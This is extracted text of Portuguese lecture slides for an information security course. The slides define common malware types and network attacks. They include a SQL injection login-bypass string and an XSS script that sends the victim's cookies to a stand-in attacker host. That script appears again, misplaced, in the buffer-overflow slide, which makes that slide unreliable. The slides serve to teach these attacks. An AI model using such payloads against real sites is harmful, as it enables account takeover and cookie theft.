1. Técnico de Manutenção e Suporte em Informática
Disciplina - Segurança da Informação
Unidade 2 – Malwares e Ataques mais comuns
Prof. Leandro Cavalcanti de Almeida
lcavalcanti.almeida@gmail.com
@leandrocalmeida
4. Vírus
Trecho de código, geralmente em assembler, que
é injetado dentro de outro aplicativo
Modo de Operação: necessidade de um código
hospedeiro para sobreviver e replicar. Necessita
da ação do usuário
Vírus
5. Keylogger
Aplicativo voltado para capturar tudo o que se é
digitado no teclado
Modo de Operação: aplicativo captura tudo que é
digitado e envia de tempos em tempos para o
atacante
Keylogger
6. Worm
Aplicativo que realiza escaneamentos na rede em
busca de hosts vulneráveis. Não necessita da ação
do usuário
Modo de Operação: Se instala e replica entre
hosts na rede de forma cíclica
Worms
7. Bot
Robô, que possui funcionalidades de worms, e fica
aguardando a ordem do seu mestre para realizar
ataques a outros computadores
Modo de Operação: Após o comando do mestre
realiza um DoS em algum outro host na rede
Bot
8. RootKit
Aplicativo que têm como finalidade permitir
acesso privilegiado a um invasor, escondendo
seus rastros
Modo de Operação: Geralmente se camufla em
outros processos do sistema e abre uma
backdoor para acessos remotos não
autorizados
Rootkits
9. Backdoor
Aplicativo que têm como finalidade permitir
acesso remoto através da abertura não autorizada
de uma porta
Modo de Operação: Geralmente habilitam uma
porta alta para acessos não autorizados
Backdoors
10. Spywares
Aplicativo que têm como finalidade coletar
informações estatísticas dos hosts e enviá-las ao
atacante
Modo de Operação: Monitoram processos e
conexões de rede e enviam essas
informações so atacante
Spywares
11. Cavalo de Tróia
Presente de grego camuflado em arquivos como
fotos, cartões virtuas, jogos,... que tem funções
destrutivas
Modo de Operação: após a vítima baixar o
“presente” o trojan instala outro Malware
Cavalo
de
Tróia
12. Ataques
Aplicação Sql Injection XSS
Buffer Overflow
Transporte TCP SYN FLOOD UDP FLOOD
Main in the Middle
Rede IP Spoofing ICMP Flooding
STP Attack
Enlace ARP Spoofing
ARP Poisoning
Físico MAC Spoofing
13. SQL Injection
Ex : Sistema de autenticação em PHP
Imagine se o usuário inserir os dados abaixo...
Login: qualquer coisa
Senha: ' OR '1'='1
SELECT * FROM usuarios WHERE login='qualquer coisa' AND senha = '' OR '1'='1'
Essa query SQL retornará todos os registros da tabela usuários!
14. XSS
Suposição:Facebook vulnerável a Cross-Site Scripting
Usuário ingênuo clica no link...
<script>
Document.location =
'http://sitedocracker.com/roubarcokkies.php=' + document.cookie
</script>
Insere um código(html, Javascript,...) malicioso no lugar de um post na
base de dados do facebook
15. Buffer Overflow
char nome[4]; int idade;
L E O 0 2 0
Entrada: LEO idade: 20
char nome[4]; int idade;
L E O O A 0
<script>
Document.location =
'http://sitedocracker.com/roubarcokkies.php=' + document.cookie
</script>
Entrada: LEOOA idade: 65
16. TCP SYN FLOOD
SYN
SYN-ACK
ACK
SYN
SYN
SYN
SYN
SYN
SYN
17. UDP FLOOD
UDP – porta qualquer
UDP – porta qualquer
UDP – porta qualquer
UDP – porta qualquer
UDP – porta qualquer
UDP – porta qualquer
18. Main in the Middle
Packet
Packet
Packet
Packet
19. IP Spoofing
Packet
Packet
10.0.0.1
Packet
Packet 10.0.0.254
Packet
Packet
Atacante envia pacotes IP falsificados para
a vítima, se passando por outro host na
10.0.0.1 rede!
22. ARP Spoofing
Packet
Packet
IP: 10.0.0.1
MAC:
Packet
68:A3:C4:9B:73:54
IP: 10.0.0.254
Packet
MAC: 52:54:00:69:42:4A
arpspoof
Packet
Packet
Atacante envia pacotes ARP falsificados
IP: 10.0.0.2 para a vítima, se passando por outro host
MAC:
na rede!
68:A3:C4:9B:73:54
23. ARP Poisoning
IP: 10.0.0.1
MAC:68:A3:C4:9B:73:54
1 MAC IP: 10.0.0.254
2 MAC MAC: 52:54:00:69:42:4A
Packet
3 MAC
4 MAC
5 MAC
6 MAC
Atacante envenena a tabela ARP do Switch
IP: 10.0.0.2
MAC: 68:A3:C4:9B:73:54
24. MAC Spoofing
Packet
Packet
68:A3:C4:9B:73:54
Packet
52:54:00:69:42:4A
Packet
Packet
Atacante envia pacotes com endereço MAC
falsificado para a vítima, se passando por
68:A3:C4:9B:73:54 outro host na rede!